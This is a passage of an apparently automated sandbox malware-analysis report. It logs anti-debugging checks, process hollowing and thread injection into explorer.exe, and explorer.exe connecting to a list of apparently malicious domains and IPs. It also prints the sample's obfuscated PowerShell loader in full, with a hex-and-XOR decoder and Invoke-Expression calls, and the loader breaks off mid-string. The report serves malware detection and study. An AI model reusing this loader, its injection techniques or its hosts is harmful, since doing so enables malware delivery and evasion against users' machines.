Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEB02A mov eax, dword ptr fs:[00000030h]	17_2_02FEB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEB02A mov eax, dword ptr fs:[00000030h]	17_2_02FEB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEB02A mov eax, dword ptr fs:[00000030h]	17_2_02FEB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEB02A mov eax, dword ptr fs:[00000030h]	17_2_02FEB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030641E8 mov eax, dword ptr fs:[00000030h]	17_2_030641E8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03088DF1 mov eax, dword ptr fs:[00000030h]	17_2_03088DF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A740D mov eax, dword ptr fs:[00000030h]	17_2_030A740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A740D mov eax, dword ptr fs:[00000030h]	17_2_030A740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A740D mov eax, dword ptr fs:[00000030h]	17_2_030A740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091C06 mov eax, dword ptr fs:[00000030h]	17_2_03091C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056C0A mov eax, dword ptr fs:[00000030h]	17_2_03056C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056C0A mov eax, dword ptr fs:[00000030h]	17_2_03056C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056C0A mov eax, dword ptr fs:[00000030h]	17_2_03056C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056C0A mov eax, dword ptr fs:[00000030h]	17_2_03056C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03057016 mov eax, dword ptr fs:[00000030h]	17_2_03057016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03057016 mov eax, dword ptr fs:[00000030h]	17_2_03057016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03057016 mov eax, dword ptr fs:[00000030h]	17_2_03057016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDB1E1 mov eax, dword ptr fs:[00000030h]	17_2_02FDB1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDB1E1 mov eax, dword ptr fs:[00000030h]	17_2_02FDB1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDB1E1 mov eax, dword ptr fs:[00000030h]	17_2_02FDB1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FED5E0 mov eax, dword ptr fs:[00000030h]	17_2_02FED5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FED5E0 mov eax, dword ptr fs:[00000030h]	17_2_02FED5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A4015 mov eax, dword ptr fs:[00000030h]	17_2_030A4015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A4015 mov eax, dword ptr fs:[00000030h]	17_2_030A4015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300BC2C mov eax, dword ptr fs:[00000030h]	17_2_0300BC2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300002D mov eax, dword ptr fs:[00000030h]	17_2_0300002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300002D mov eax, dword ptr fs:[00000030h]	17_2_0300002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300002D mov eax, dword ptr fs:[00000030h]	17_2_0300002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300002D mov eax, dword ptr fs:[00000030h]	17_2_0300002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300002D mov eax, dword ptr fs:[00000030h]	17_2_0300002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300A44B mov eax, dword ptr fs:[00000030h]	17_2_0300A44B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306C450 mov eax, dword ptr fs:[00000030h]	17_2_0306C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306C450 mov eax, dword ptr fs:[00000030h]	17_2_0306C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD2D8A mov eax, dword ptr fs:[00000030h]	17_2_02FD2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD2D8A mov eax, dword ptr fs:[00000030h]	17_2_02FD2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD2D8A mov eax, dword ptr fs:[00000030h]	17_2_02FD2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD2D8A mov eax, dword ptr fs:[00000030h]	17_2_02FD2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD2D8A mov eax, dword ptr fs:[00000030h]	17_2_02FD2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03092073 mov eax, dword ptr fs:[00000030h]	17_2_03092073
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFC182 mov eax, dword ptr fs:[00000030h]	17_2_02FFC182
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A1074 mov eax, dword ptr fs:[00000030h]	17_2_030A1074
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03053884 mov eax, dword ptr fs:[00000030h]	17_2_03053884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03053884 mov eax, dword ptr fs:[00000030h]	17_2_03053884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFC577 mov eax, dword ptr fs:[00000030h]	17_2_02FFC577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFC577 mov eax, dword ptr fs:[00000030h]	17_2_02FFC577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDB171 mov eax, dword ptr fs:[00000030h]	17_2_02FDB171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDB171 mov eax, dword ptr fs:[00000030h]	17_2_02FDB171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDC962 mov eax, dword ptr fs:[00000030h]	17_2_02FDC962
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0 mov eax, dword ptr fs:[00000030h]	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0 mov eax, dword ptr fs:[00000030h]	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0 mov eax, dword ptr fs:[00000030h]	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0 mov eax, dword ptr fs:[00000030h]	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0 mov eax, dword ptr fs:[00000030h]	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0 mov eax, dword ptr fs:[00000030h]	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030190AF mov eax, dword ptr fs:[00000030h]	17_2_030190AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF7D50 mov eax, dword ptr fs:[00000030h]	17_2_02FF7D50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFB944 mov eax, dword ptr fs:[00000030h]	17_2_02FFB944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFB944 mov eax, dword ptr fs:[00000030h]	17_2_02FFB944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300F0BF mov ecx, dword ptr fs:[00000030h]	17_2_0300F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300F0BF mov eax, dword ptr fs:[00000030h]	17_2_0300F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300F0BF mov eax, dword ptr fs:[00000030h]	17_2_0300F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE3D34 mov eax, dword ptr fs:[00000030h]	17_2_02FE3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDAD30 mov eax, dword ptr fs:[00000030h]	17_2_02FDAD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0306B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306B8D0 mov ecx, dword ptr fs:[00000030h]	17_2_0306B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0306B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0306B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0306B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0306B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A8CD6 mov eax, dword ptr fs:[00000030h]	17_2_030A8CD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF4120 mov eax, dword ptr fs:[00000030h]	17_2_02FF4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF4120 mov eax, dword ptr fs:[00000030h]	17_2_02FF4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF4120 mov eax, dword ptr fs:[00000030h]	17_2_02FF4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF4120 mov eax, dword ptr fs:[00000030h]	17_2_02FF4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF4120 mov ecx, dword ptr fs:[00000030h]	17_2_02FF4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030914FB mov eax, dword ptr fs:[00000030h]	17_2_030914FB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056CF0 mov eax, dword ptr fs:[00000030h]	17_2_03056CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056CF0 mov eax, dword ptr fs:[00000030h]	17_2_03056CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03056CF0 mov eax, dword ptr fs:[00000030h]	17_2_03056CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9100 mov eax, dword ptr fs:[00000030h]	17_2_02FD9100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9100 mov eax, dword ptr fs:[00000030h]	17_2_02FD9100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9100 mov eax, dword ptr fs:[00000030h]	17_2_02FD9100

Source: C:\Windows\SysWOW64\cmd.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 13_3_2254DE50 LdrInitializeThunk,

13_3_2254DE50

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nichevesting.com
Source: C:\Windows\explorer.exe	Domain query: www.deepee.xyz
Source: C:\Windows\explorer.exe	Network Connect: 208.109.43.28 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe	Domain query: www.shivanshnegi.com
Source: C:\Windows\explorer.exe	Domain query: www.xn--lst4d-fwa.site
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 183.181.84.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.star-house.okinawa
Source: C:\Windows\explorer.exe	Network Connect: 104.21.67.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 49.212.180.95 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.julesgifts.co.uk
Source: C:\Windows\explorer.exe	Domain query: www.bebas88official.click
Source: C:\Windows\explorer.exe	Domain query: www.bestservicesandtrade.org
Source: C:\Windows\explorer.exe	Network Connect: 172.96.191.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.236.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 212.227.172.253 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ghostdyes.net

Sample uses process hollowing technique

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1B0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 3452			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3452			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vakanc = """nffusnlcktpioopnc ecfrsobubpsigefrdscru0j2h t{s a w s hpmaurwatmk(m[ssbtbrritnmga]u`$ltsitlwbrluitvc)b;p l`$mfmoudlfusstu p=m i`$etmislmbelfirvt.slperncgrtlhr;s a s v n`$tsukbablflseltaebfs p=u fnmekwr-gosbtjuefcatt fbtyotien[t]d p(d`$ufwoddpfussth c/u s2f)f;l m d s eftokrs(s`$sdaecpbernpdceznash=f0a;i b`$bdgespreonpdgemnssb p-klbtm a`$pffokdafsshtc;p u`$sdieupfemnfdoeenfsi+v=m2k)h{m a s u d`$coysptteaoepulraa p=o a`$itdimlcbclbiovb.gstugbbssttrpiknugb(m`$odfesplepnaddebnsss,r s2f)a;e d a u m`$psaklaolslpemtseefa[c`$udsefpsepnodsemnhsv/v2a]v d=b t[ccaosnbviearbtt]v:j:itfohbfybtkec(r`$fobshtdemovpslfap,d b1l6r)p;k d l`$ssbkuaslslreetfeofv[i`$rdpesplepnzdkecnpsd/t2a]r c=u d(h`$nsukvatlclveftmenfu[u`$ddueppmeinbdnebnlse/p2i]o i-pbmxtobrs s1i0s2p)p;n o s u s}s r[psttprdientgb]u[esayrsatbebmm.stkebxpth.keanwcuobdeignmgk]l:a:napshcvipis.egmehtmsdttreicnvgl(s`$rsmkaaolulmeatoelfu)c;s}pspeetp-hcvobndtuefnhtb n'bem:s\ecormosucpnisesrbskre0u3h'a b'u2v'p;s`$tdmecplruar v=g agseptn-gcsogngtyefnlts g'sel:m\rcrrsotuipliceartshra0g3s's;o`$rbeouukgn0t=pcgrholuapgibemrbssrs0b2k t'h3a5p1ofa1f5e1p2b0a3p0ubo4f8m0l2b0wab0cal's;gigfu a(s`$tdkeepnraak h-qelqk p'o2b'r)f r{b`$ubconucge0w=m's'm}f;p`$abbopukgc1b=ccfrgoputprisecrdssrt0r2v t's2ibb0ufp0b5a1g4b0m9n1a5k0f9s0d0t1f2h4k8v3s1l0ufd0s8g5v5n5g4s4t8s3d3p0s8v1s5m0t7s0a0u0a3m2p8f0b7o1n2h0rfw1j0t0p3j2cbs0f3m1s2h0sed0p9k0o2f1b5p'f;d`$ibnofulgm2g=mctruoeuspciteirssirt0o2l s'm2g1s0s3s1o2k3t6i1o4l0k9r0f5i2u7m0p2r0b2c1f4g0f3s1s5f1u5a'l;h`$tbkovusgm3e=scsrdofuopnikerrsskrs0s2u x'a3m5o1fft1s5k1d2f0a3o0sbw4h8d3d4u1m3s0k8e1s2a0vfl0hbi0s3o4s8p2hfc0i8e1p2b0f3r1w4s0t9p1t6w3g5p0e3f1d4s1b0p0sfr0a5b0b3t1o5u4g8e2bep0c7h0b8s0c2b0cah0n3b3f4t0z3s0a0f'a;d`$abnoqumgt4h=ccdrbodusppicetrzshrd0m2t t'm1t5i1o2v1d4u0efc0e8u0g1w'r;h`$sbpokulgc5s=gcuruoeurptisenrbslrf0a2p p'r2o1t0o3u1s2d2tbv0p9h0u2f1c3b0nag0n3s2kee0l7b0o8s0f2v0uar0w3d'u;s`$fbposudgo6f=pcsrsosuaptisetressrt0h2s t't3s4f3p2h3u5t1n6u0l3b0i5a0sfi0k7h0fat2l8n0s7a0fbs0n3m4daa4t6u2zed0afi0w2p0k3r2e4t1sff3i5v0tfm0a1p4tas4g6b3c6s1l3o0r4h0mae0bfu0m5a'a;c`$sbiotukgr7s=ccgraofufpciuecrusurb0e2w f'a3a4p1k3p0i8o1u2s0ofm0tbp0k3s4haa4t6l2ubp0s7l0f8d0g7s0t1l0z3a0m2e's;p`$tbfofufgu8b=bcjrsobucpriueprpstrm0s2h t'k3c4p0b3b0h0c0cab0f3p0t5u1s2e0s3u0u2m2h2p0c3p0sah0i3s0u1k0t7p1p2n0a3s't;j`$gbsolufgm9v=acerhoruoppisetrdsnrs0n2n a'm2aff0p8g2hbj0s3a0pbt0s9p1d4a1fff2pbs0s9o0s2s1c3t0daf0s3b'd;r`$cshpfrigkee0r=icbruoaulpdibeurhsprb0g2z p'u2cbb1sfc2o2p0m3d0eas0s3o0i1l0t7a1u2k0d3p3n2a1tfr1k6m0h3l'o;d`$ussporfgceo1f=scrrnosufphikeirbsorr0f2b r'g2u5w0has0h7a1d5m1l5a4bad4s6b3g6j1a3s0w4d0rah0tfk0h5s4sal4p6s3d5p0f3l0g7e0eah0c3l0r2d4sam4r6t2u7r0h8g1n5s0hff2w5s0fac0k7k1b5u1h5d4bar4f6f2l7m1f3d1o2s0p9o2m5m0tap0p7c1p5s1s5i'f;s`$gsapcrugpee2u=kcjrcogugpsibesrpsert0t2s r'r2gfu0t8s1s0t0d9i0idf0c3g'p;m`$tsbparqgmeh3f=mcurdosuppfibemrasgrk0s2a k'g3c6k1a3v0a4p0aad0pfb0k5v4rac4h6c2seh0ufc0h2m0d3s2d4k1af
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function croupiersr02 { param([string]$tilbliv); $fodfst = $tilbliv.length; $skalletef = new-object byte[] ($fodfst / 2); for($dependens=0; $dependens -lt $fodfst; $dependens+=2){ $osteopla = $tilbliv.substring($dependens, 2); $skalletef[$dependens/2] = [convert]::tobyte($osteopla, 16); $skalletef[$dependens/2] = ($skalletef[$dependens/2] -bxor 102); } [string][system.text.encoding]::ascii.getstring($skalletef);}set-content 'e:\croupiersr03' '2';$depra = get-content 'e:\croupiersr03';$boug0=croupiersr02 '351f1512030b48020a0a';if ($depra -eq '2') {$boug0=''};$boug1=croupiersr02 '2b0f0514091509001248310f085554483308150700032807120f10032b03120e090215';$boug2=croupiersr02 '2103123614090527020214031515';$boug3=croupiersr02 '351f1512030b48341308120f0b03482f081203140916350314100f050315482e0708020a03340300';$boug4=croupiersr02 '1512140f0801';$boug5=croupiersr02 '2103122b0902130a032e0708020a03';$boug6=croupiersr02 '3432351603050f070a28070b034a462e0f0203241f350f014a463613040a0f05';$boug7=croupiersr02 '341308120f0b034a462b070807010302';$boug8=croupiersr02 '3403000a030512030222030a0301071203';$boug9=croupiersr02 '2f082b030b09141f2b0902130a03';$sprge0=croupiersr02 '2b1f22030a0301071203321f1603';$sprge1=croupiersr02 '250a0715154a463613040a0f054a463503070a03024a462708150f250a0715154a4627131209250a071515';$sprge2=croupiersr02 '2f0810090d03';$sprge3=croupiersr02 '3613040a0f054a462e0f0203241f350f014a46280311350a09124a46300f141213070a';$sprge4=croupiersr02 '300f141213070a270a0a0905';$sprge5=croupiersr02 '0812020a0a';$sprge6=croupiersr02 '281236140912030512300f141213070a2b030b09141f';$sprge7=croupiersr02 '2f233e';$sprge8=croupiersr02 '3a';$frekvenss=croupiersr02 '333523345554';$hematopat=croupiersr02 '25070a0a310f080209113614090527';function fkp {param ($fortrng49, $fjasende) ;$forth0 =croupiersr02 '420414070503141f0d465b464e3d27161622090b070f083b5c5c2513141403081222090b070f0848210312271515030b040a0f03154e4f461a46310e0314034b29040c030512461d46423948210a0904070a271515030b040a1f2507050e03464b270802464239482a090507120f09084835160a0f124e4235161401035e4f3d4b573b48231713070a154e4224091301564f461b4f48210312321f16034e4224091301574f';&($sprge7) $forth0;$forth5 = croupiersr02 '4227151203080f150b465b46420414070503141f0d482103122b03120e09024e4224091301544a463d321f16033d3b3b46264e4224091301554a464224091301524f4f';&($sprge7) $forth5;$forth1 = croupiersr02 '140312131408464227151203080f150b482f0810090d034e4208130a0a4a46264e3d351f1512030b48341308120f0b03482f081203140916350314100f050315482e0708020a033403003b4e2803114b29040c03051246351f1512030b48341308120f0b03482f081203140916350314100f050315482e0708020a033403004e4e2803114b29040c030512462f08123612144f4a464e420414070503141f0d482103122b03120e09024e4224091301534f4f482f0810090d034e4208130a0a4a46264e4220091412140801525f4f4f4f4f4a4642200c0715030802034f4f';&($sprge7) $forth1;}function gdt {param ([parame
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vakanc = """nffusnlcktpioopnc ecfrsobubpsigefrdscru0j2h t{s a w s hpmaurwatmk(m[ssbtbrritnmga]u`$ltsitlwbrluitvc)b;p l`$mfmoudlfusstu p=m i`$etmislmbelfirvt.slperncgrtlhr;s a s v n`$tsukbablflseltaebfs p=u fnmekwr-gosbtjuefcatt fbtyotien[t]d p(d`$ufwoddpfussth c/u s2f)f;l m d s eftokrs(s`$sdaecpbernpdceznash=f0a;i b`$bdgespreonpdgemnssb p-klbtm a`$pffokdafsshtc;p u`$sdieupfemnfdoeenfsi+v=m2k)h{m a s u d`$coysptteaoepulraa p=o a`$itdimlcbclbiovb.gstugbbssttrpiknugb(m`$odfesplepnaddebnsss,r s2f)a;e d a u m`$psaklaolslpemtseefa[c`$udsefpsepnodsemnhsv/v2a]v d=b t[ccaosnbviearbtt]v:j:itfohbfybtkec(r`$fobshtdemovpslfap,d b1l6r)p;k d l`$ssbkuaslslreetfeofv[i`$rdpesplepnzdkecnpsd/t2a]r c=u d(h`$nsukvatlclveftmenfu[u`$ddueppmeinbdnebnlse/p2i]o i-pbmxtobrs s1i0s2p)p;n o s u s}s r[psttprdientgb]u[esayrsatbebmm.stkebxpth.keanwcuobdeignmgk]l:a:napshcvipis.egmehtmsdttreicnvgl(s`$rsmkaaolulmeatoelfu)c;s}pspeetp-hcvobndtuefnhtb n'bem:s\ecormosucpnisesrbskre0u3h'a b'u2v'p;s`$tdmecplruar v=g agseptn-gcsogngtyefnlts g'sel:m\rcrrsotuipliceartshra0g3s's;o`$rbeouukgn0t=pcgrholuapgibemrbssrs0b2k t'h3a5p1ofa1f5e1p2b0a3p0ubo4f8m0l2b0wab0cal's;gigfu a(s`$tdkeepnraak h-qelqk p'o2b'r)f r{b`$ubconucge0w=m's'm}f;p`$abbopukgc1b=ccfrgoputprisecrdssrt0r2v t's2ibb0ufp0b5a1g4b0m9n1a5k0f9s0d0t1f2h4k8v3s1l0ufd0s8g5v5n5g4s4t8s3d3p0s8v1s5m0t7s0a0u0a3m2p8f0b7o1n2h0rfw1j0t0p3j2cbs0f3m1s2h0sed0p9k0o2f1b5p'f;d`$ibnofulgm2g=mctruoeuspciteirssirt0o2l s'm2g1s0s3s1o2k3t6i1o4l0k9r0f5i2u7m0p2r0b2c1f4g0f3s1s5f1u5a'l;h`$tbkovusgm3e=scsrdofuopnikerrsskrs0s2u x'a3m5o1fft1s5k1d2f0a3o0sbw4h8d3d4u1m3s0k8e1s2a0vfl0hbi0s3o4s8p2hfc0i8e1p2b0f3r1w4s0t9p1t6w3g5p0e3f1d4s1b0p0sfr0a5b0b3t1o5u4g8e2bep0c7h0b8s0c2b0cah0n3b3f4t0z3s0a0f'a;d`$abnoqumgt4h=ccdrbodusppicetrzshrd0m2t t'm1t5i1o2v1d4u0efc0e8u0g1w'r;h`$sbpokulgc5s=gcuruoeurptisenrbslrf0a2p p'r2o1t0o3u1s2d2tbv0p9h0u2f1c3b0nag0n3s2kee0l7b0o8s0f2v0uar0w3d'u;s`$fbposudgo6f=pcsrsosuaptisetressrt0h2s t't3s4f3p2h3u5t1n6u0l3b0i5a0sfi0k7h0fat2l8n0s7a0fbs0n3m4daa4t6u2zed0afi0w2p0k3r2e4t1sff3i5v0tfm0a1p4tas4g6b3c6s1l3o0r4h0mae0bfu0m5a'a;c`$sbiotukgr7s=ccgraofufpciuecrusurb0e2w f'a3a4p1k3p0i8o1u2s0ofm0tbp0k3s4haa4t6l2ubp0s7l0f8d0g7s0t1l0z3a0m2e's;p`$tbfofufgu8b=bcjrsobucpriueprpstrm0s2h t'k3c4p0b3b0h0c0cab0f3p0t5u1s2e0s3u0u2m2h2p0c3p0sah0i3s0u1k0t7p1p2n0a3s't;j`$gbsolufgm9v=acerhoruoppisetrdsnrs0n2n 